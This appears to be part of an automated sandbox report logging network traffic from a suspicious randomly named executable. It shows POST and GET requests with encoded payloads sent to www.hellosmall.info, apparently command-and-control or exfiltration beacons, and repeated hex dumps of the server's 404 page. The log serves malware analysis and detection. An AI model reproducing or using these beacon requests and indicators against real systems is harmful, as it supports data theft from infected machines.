                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                                                                              Oct 8, 2024 05:29:19.606982946 CEST224INData Raw: 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 30 64 65 67 29 3b 0a 20 20 7d 0a 20 20 20 31 30 30 25 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79
                                                                                              Data Ascii: transform: rotateX(0deg); } 100%{ transform: rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px;
                                                                                              Oct 8, 2024 05:29:19.607003927 CEST1236INData Raw: 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f
                                                                                              Data Ascii: display: flex; align-items: center; justify-content: center;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset:
                                                                                              Oct 8, 2024 05:29:19.607038021 CEST1236INData Raw: 31 31 2e 32 36 34 2d 32 32 2e 35 37 34 20 38 2e 35 37 34 2d 33 34 2e 37 31 36 2d 32 2e 36 39 32 2d 31 32 2e 31 34 31 2d 31 31 2e 33 32 36 2d 32 32 2e 35 33 38 2d 32 32 2e 31 38 38 2d 32 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d
                                                                                              Data Ascii: 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-
                                                                                              Oct 8, 2024 05:29:19.607053995 CEST1236INData Raw: 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 45 36 41 39 35 46 22 20 64 3d 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e
                                                                                              Data Ascii: "translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.4
                                                                                              Oct 8, 2024 05:29:19.607070923 CEST1236INData Raw: 20 37 2e 37 36 2d 32 31 2e 39 30 34 2e 35 36 2d 33 38 2e 36 30 34 20 31 2e 30 31 32 2d 34 39 2e 38 34 33 2d 2e 34 36 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238-1.15.042-.4
                                                                                              Oct 8, 2024 05:29:19.607085943 CEST896INData Raw: 39 2d 31 2e 34 39 37 4d 32 33 2e 35 31 33 20 31 35 2e 30 37 38 63 2d 2e 33 38 35 2e 34 31 34 2d 2e 35 30 35 20 31 2e 35 36 36 2d 2e 35 31 33 20 32 2e 33 38 31 2d 2e 30 30 35 2e 34 37 2e 33 33 33 2e 37 34 39 2e 34 37 2e 33 35 2e 32 30 36 2d 2e 35
                                                                                              Data Ascii: 9-1.497M23.513 15.078c-.385.414-.505 1.566-.513 2.381-.005.47.333.749.47.35.206-.592.422-1.34.517-2.047.082-.598-.253-.921-.474-.684M38.964 14.6c-.26-.324-1.293-.581-2.192-.6-.626-.012-.971.28-.65.452.459.244 1.155.57 2.063.547.56-.014.936-.20
                                                                                              Oct 8, 2024 05:29:19.607120037 CEST1236INData Raw: 2d 2e 32 38 32 2e 31 34 38 2d 2e 33 38 32 2e 37 39 31 2d 2e 30 35 37 2e 39 37 39 2e 31 31 37 2e 30 36 37 2e 32 32 2e 32 34 2e 33 33 33 2e 33 32 35 2e 31 36 38 2e 31 32 38 2e 33 33 36 2e 32 34 37 2e 35 30 38 2e 33 36 34 2e 33 32 37 2e 32 31 39 2e
                                                                                              Data Ascii: -.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219.564.609.873.868.537.45 1.27-.42 1.04-1.251M66.549 15.017c-.83-.233-.486 2.056-.435 2.528.055.51.678.664.741.08.068-.628.42-2.405-.306-2.608M54.803 16.301c-.065-.
                                                                                              Oct 8, 2024 05:29:19.607132912 CEST224INData Raw: 38 4d 38 30 2e 34 33 37 20 31 2e 32 38 33 63 2d 2e 33 38 35 2d 2e 32 32 2d 2e 38 34 34 2d 2e 33 32 37 2d 31 2e 32 37 32 2d 2e 32 36 36 2d 2e 34 39 37 2e 30 37 31 2d 2e 37 2e 33 36 33 2d 31 2e 30 33 33 2e 37 32 34 2d 2e 33 35 36 2e 33 38 38 2e 30
                                                                                              Data Ascii: 8M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.07 1.143.54.93l-.065-.083c.095.05.192.08.295.09.177.032.31.074.477.16.373.189.702.503 1.023.78.348.301 1.738.788 1.586-.245-.141-.963-.789-1.65
                                                                                              Oct 8, 2024 05:29:19.607150078 CEST1236INData Raw: 32 2d 31 2e 35 35 31 2d 32 2e 30 39 4d 37 38 2e 39 35 35 20 38 2e 30 38 32 63 2d 2e 31 33 34 2d 2e 35 35 2d 2e 32 35 39 2d 31 2e 31 32 36 2d 2e 33 36 36 2d 31 2e 37 30 33 2d 2e 31 30 32 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31
                                                                                              Data Ascii: 2-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525
                                                                                              Oct 8, 2024 05:29:19.607187033 CEST1236INData Raw: 33 35 37 2d 2e 30 35 33 2e 35 33 39 2d 2e 30 31 33 2e 32 34 35 2e 30 31 36 2e 34 35 2e 30 36 2e 36 31 32 2e 30 39 31 2e 33 33 2e 33 32 2e 35 31 35 2e 35 33 2e 33 30 34 2e 31 30 38 2d 2e 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e
                                                                                              Data Ascii: 357-.053.539-.013.245.016.45.06.612.091.33.32.515.53.304.108-.11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.24


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              19192.168.2.450024184.94.215.26805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:29:21.508083105 CEST10783OUTPOST /skre/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 10302
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.hellosmall.info
                                                                                              Origin: http://www.hellosmall.info
                                                                                              Referer: http://www.hellosmall.info/skre/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 66 38 37 33 33 44 6b 4b 70 6c 52 70 6c 36 76 66 77 74 4e 39 52 75 52 6b 4f 71 41 59 79 71 70 64 30 6f 49 76 2f 74 4f 74 2f 39 7a 63 78 49 4a 44 6e 6e 54 38 41 4c 53 6b 4d 4d 39 4c 53 37 6e 75 6f 47 66 38 62 6b 4c 32 6c 61 50 38 68 39 46 54 6f 35 6c 56 65 76 71 64 6b 66 4a 4b 65 72 47 56 67 49 78 55 6a 48 2b 48 32 47 6e 34 4c 70 56 4c 5a 4d 34 34 35 42 54 30 48 46 6e 53 49 78 55 49 4c 31 4a 54 76 6a 59 39 74 2f 53 51 4b 30 6f 4c 33 64 67 35 48 53 63 59 56 6b 34 47 4c 6a 64 62 56 44 42 35 4f 49 5a 36 4d 52 75 77 67 7a 67 65 4e 2f 63 30 6f 78 65 32 37 64 67 62 5a 36 75 63 4d 72 46 78 56 43 70 76 4e 7a 65 62 4b 48 4a 4e 49 31 2b 61 45 6b 75 58 79 75 66 48 6d 71 74 4a 31 4a 35 61 39 4e 38 62 35 50 49 4b 64 76 74 2f 4c 4d 35 79 6a 35 4b 63 56 47 39 53 35 57 44 2f 35 47 5a 43 35 49 79 74 4e 7a 55 51 4b 43 43 47 38 4c 30 55 4e 73 44 69 2f 69 56 73 34 74 4e 48 76 44 41 49 57 50 75 72 7a 31 53 44 49 31 4e 71 47 66 6a 57 36 77 33 4d 6e 43 48 39 63 72 64 35 4f 71 63 5a 39 33 62 38 44 58 58 32 [TRUNCATED]
                                                                                              Data Ascii: FJiPC=f8733DkKplRpl6vfwtN9RuRkOqAYyqpd0oIv/tOt/9zcxIJDnnT8ALSkMM9LS7nuoGf8bkL2laP8h9FTo5lVevqdkfJKerGVgIxUjH+H2Gn4LpVLZM445BT0HFnSIxUIL1JTvjY9t/SQK0oL3dg5HScYVk4GLjdbVDB5OIZ6MRuwgzgeN/c0oxe27dgbZ6ucMrFxVCpvNzebKHJNI1+aEkuXyufHmqtJ1J5a9N8b5PIKdvt/LM5yj5KcVG9S5WD/5GZC5IytNzUQKCCG8L0UNsDi/iVs4tNHvDAIWPurz1SDI1NqGfjW6w3MnCH9crd5OqcZ93b8DXX2k5/kJG8tfcl1GMvOoWUzbYZ5gyvwPhq7CPYAMmBEaKy+baSbkgArHpAM6JcFu0PDJ6QzFF+mxLLhT6B3ec86jLA4T1nfRXe26taf0o5zrCYg2fpsQi63k8v87ouIpoM/yOg3B6h+UVrA0peLUeWxzUq4v/6lOMvgufYn4dPRMdnQM5gfpJKi7rf6/P1rTmGLVo02wq34365VVgI/NcTHr2CmxqWAg8L0SY4Dl66YMQTRxul2HYUs9f6/De1h2GadlgaNqOhI59t9DbRcZPB4DmRdlY28xJAGVD2AukZTZg0oYYcrK/cZMVOtQqXnnC69LLrfrsupufozajqtAttUrb5Hguxik7YchoGKEsihweVmvpPBhVMKzBriKKNeRAdNOFPRfwfo+C3GCvySjoBCDPRDw/h9aV04kes0wJyKznq3BaIPOVJxjx91LPP2G0dzvtXB9z1jfjlihOkaJAchtHG8gi6WOM3h2swnTr3NYmcVKREZeygT7gl4qykitHzIwTqSVaUiy62h0KzL6lyyM2mEETT6U7v4jFbp1hTZT9Y4wns5rRswWtgjcoF1R+spN0ZlD9J4PIXWVXvBvAffyKFYkjDq78tGTzFmolJmx/AW3/noIKkzifgJ/efMC62jFI3bRXBjFRLF2iaZJMp+F0SGNi2d/g/nXC [TRUNCATED]
                                                                                              Oct 8, 2024 05:29:22.228532076 CEST1236INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 03:29:22 GMT
                                                                                              Server: Apache
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 13840
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                                                                              Oct 8, 2024 05:29:22.228604078 CEST1236INData Raw: 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 30 64 65 67 29 3b 0a 20 20 7d 0a 20 20 20 31 30 30 25 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79
                                                                                              Data Ascii: transform: rotateX(0deg); } 100%{ transform: rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; al
                                                                                              Oct 8, 2024 05:29:22.228640079 CEST1236INData Raw: 36 2e 32 32 35 2d 34 2e 33 34 2d 33 34 2e 34 39 35 2d 31 37 2e 37 34 34 2d 34 31 2e 38 30 36 2d 37 2e 38 33 34 2d 34 2e 32 37 33 2d 31 37 2e 31 39 36 2d 34 2e 31 2d 32 35 2e 37 2d 31 2e 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36
                                                                                              Data Ascii: 6.225-4.34-34.495-17.744-41.806-7.834-4.273-17.196-4.1-25.7-1.774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574
                                                                                              Oct 8, 2024 05:29:22.228673935 CEST672INData Raw: 36 20 33 2e 37 31 33 2d 2e 37 34 37 20 39 2e 36 36 36 20 31 2e 32 34 20 31 33 2e 33 37 32 20 31 2e 39 38 35 20 33 2e 37 30 37 20 31 32 2e 36 39 20 32 30 2e 38 20 36 35 2e 31 37 35 20 32 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38
                                                                                              Data Ascii: 6 3.713-.747 9.666 1.24 13.372 1.985 3.707 12.69 20.8 65.175 21.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"
                                                                                              Oct 8, 2024 05:29:22.228707075 CEST1236INData Raw: 31 34 20 39 2e 37 36 37 20 35 2e 32 32 39 20 32 38 2e 32 34 20 31 30 2e 32 35 37 20 34 34 2e 32 36 37 20 31 30 2e 30 31 35 20 31 36 2e 30 32 38 2d 2e 32 34 33 20 33 37 2e 34 38 2d 2e 34 38 31 20 35 32 2e 35 34 33 2d 35 2e 33 33 33 20 31 35 2e 30
                                                                                              Data Ascii: 14 9.767 5.229 28.24 10.257 44.267 10.015 16.028-.243 37.48-.481 52.543-5.333 15.06-4.852 16.223-9.55 17.998-13.298 1.774-3.748-107.32-7.809-124.3-3.524" transform="translate(161 68)"/> </g> <g class="pao-cima">
                                                                                              Oct 8, 2024 05:29:22.228754997 CEST1236INData Raw: 33 2d 2e 37 2d 2e 38 38 32 2d 2e 36 31 32 4d 35 31 2e 36 32 31 20 39 2e 32 34 37 63 2d 2e 31 38 32 2d 2e 34 30 39 2d 2e 36 38 2d 2e 33 32 35 2d 2e 36 31 35 2e 33 36 34 2e 30 36 33 2e 36 38 37 2e 30 30 37 20 31 2e 34 38 35 2e 32 35 20 32 2e 30 36
                                                                                              Data Ascii: 3-.7-.882-.612M51.621 9.247c-.182-.409-.68-.325-.615.364.063.687.007 1.485.25 2.067.19.458.694.473.737-.25.043-.759-.109-1.592-.372-2.181M32.55 15.101c-1.206.547-1.849 1.662-1.414 2.552.188.384 1.21.504 1.46.077.188-.32.407-.629.616-.942.243-.
                                                                                              Oct 8, 2024 05:29:22.228787899 CEST1236INData Raw: 2e 34 33 37 2e 33 38 34 2e 38 33 36 2e 32 34 37 2e 35 33 37 2d 2e 31 38 35 20 31 2e 32 39 2d 2e 31 38 37 20 31 2e 38 33 32 2d 2e 33 36 34 2e 35 39 2d 2e 31 39 33 2e 33 33 37 2d 2e 35 39 31 2d 2e 34 34 31 2d 2e 35 39 31 4d 36 30 2e 35 38 39 20 39
                                                                                              Data Ascii: .437.384.836.247.537-.185 1.29-.187 1.832-.364.59-.193.337-.591-.441-.591M60.589 9.375c-.101-.522-.482-.493-.556.048-.12.852.102 1.815.423 2.412.213.396.543.02.544-.494.002-.736-.283-1.302-.411-1.966M69.955 3.569c-.44-.473-1.713-.712-2.727-.47
                                                                                              Oct 8, 2024 05:29:22.228820086 CEST672INData Raw: 2e 39 39 33 2e 39 34 32 20 31 2e 35 37 34 2e 34 37 36 2e 34 30 37 2d 2e 33 32 36 2e 37 34 36 2d 2e 37 35 35 20 31 2e 30 35 38 2d 31 2e 31 34 39 2e 33 36 34 2d 2e 34 36 32 2e 34 34 31 2d 2e 39 32 33 2e 32 37 37 2d 31 2e 33 33 38 4d 36 32 2e 39 30
                                                                                              Data Ascii: .993.942 1.574.476.407-.326.746-.755 1.058-1.149.364-.462.441-.923.277-1.338M62.906 5.209c-.447-.277-1.34-.251-1.957-.083-.279.077-.57.172-.738.298-.069.051-.108.105-.15.16-.025.038-.037.076-.038.115.043.077.042.09-.003.037-.154.243.622.357.92
                                                                                              Oct 8, 2024 05:29:22.228864908 CEST1236INData Raw: 32 2d 31 2e 35 35 31 2d 32 2e 30 39 4d 37 38 2e 39 35 35 20 38 2e 30 38 32 63 2d 2e 31 33 34 2d 2e 35 35 2d 2e 32 35 39 2d 31 2e 31 32 36 2d 2e 33 36 36 2d 31 2e 37 30 33 2d 2e 31 30 32 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31
                                                                                              Data Ascii: 2-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525
                                                                                              Oct 8, 2024 05:29:22.228899956 CEST1236INData Raw: 33 35 37 2d 2e 30 35 33 2e 35 33 39 2d 2e 30 31 33 2e 32 34 35 2e 30 31 36 2e 34 35 2e 30 36 2e 36 31 32 2e 30 39 31 2e 33 33 2e 33 32 2e 35 31 35 2e 35 33 2e 33 30 34 2e 31 30 38 2d 2e 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e
                                                                                              Data Ascii: 357-.053.539-.013.245.016.45.06.612.091.33.32.515.53.304.108-.11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.24
                                                                                              Oct 8, 2024 05:29:22.233956099 CEST1236INData Raw: 63 2e 30 36 2d 2e 31 31 34 2e 30 38 33 2d 2e 32 36 36 2d 2e 30 32 35 2d 2e 33 37 32 4d 31 30 36 2e 37 39 38 20 32 32 2e 32 32 63 2d 2e 31 30 37 2d 2e 32 39 32 2d 2e 37 35 37 2d 2e 33 30 34 2d 2e 37 39 34 2e 30 32 38 2d 2e 30 33 32 2e 32 39 33 2e
                                                                                              Data Ascii: c.06-.114.083-.266-.025-.372M106.798 22.22c-.107-.292-.757-.304-.794.028-.032.293.107.618.488.731.229.068.532-.032.507-.257-.021-.186-.137-.329-.201-.502M70.884 28.197c-.13-.291-.716-.24-.83.025-.131.304-.034.606.41.754.101.033.24.034.334-.012


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              20192.168.2.450025184.94.215.26805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:29:24.050610065 CEST407OUTGET /skre/?FJiPC=S+TX00U190oTp+a4+Mh6JOZKCfYk0qlS074izuiXtvjO4IlC6yG6IaWxS8JxCfvRqFT3VFWs4J33oL1Eg51tY/qkmOhlT5GkiLFdmWmV2m3xIoZVeIF78zA=&2FO=QBbT1R8 HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              Host: www.hellosmall.info
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Oct 8, 2024 05:29:24.715795040 CEST1236INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 03:29:24 GMT
                                                                                              Server: Apache
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 13840
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                                                                              Oct 8, 2024 05:29:24.715846062 CEST224INData Raw: 6c 68 6f 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 30 64 65 67 29 3b 0a 20 20 7d 0a 20 20 20 31 30 30 25 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65
                                                                                              Data Ascii: lhos{ 0%{ transform: rotateX(0deg); } 100%{ transform: rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-w
                                                                                              Oct 8, 2024 05:29:24.715882063 CEST1236INData Raw: 69 64 74 68 3a 20 34 36 30 70 78 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a
                                                                                              Data Ascii: idth: 460px; display: flex; align-items: center; justify-content: center;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; str
                                                                                              Oct 8, 2024 05:29:24.715918064 CEST1236INData Raw: 32 36 20 37 2e 39 32 37 2d 39 2e 30 36 33 20 31 31 2e 32 36 34 2d 32 32 2e 35 37 34 20 38 2e 35 37 34 2d 33 34 2e 37 31 36 2d 32 2e 36 39 32 2d 31 32 2e 31 34 31 2d 31 31 2e 33 32 36 2d 32 32 2e 35 33 38 2d 32 32 2e 31 38 38 2d 32 36 2e 37 31 35
                                                                                              Data Ascii: 26 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.50
                                                                                              Oct 8, 2024 05:29:24.715950012 CEST1236INData Raw: 30 35 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 45 36 41 39 35 46 22 20 64 3d 22 4d 33 34 2e
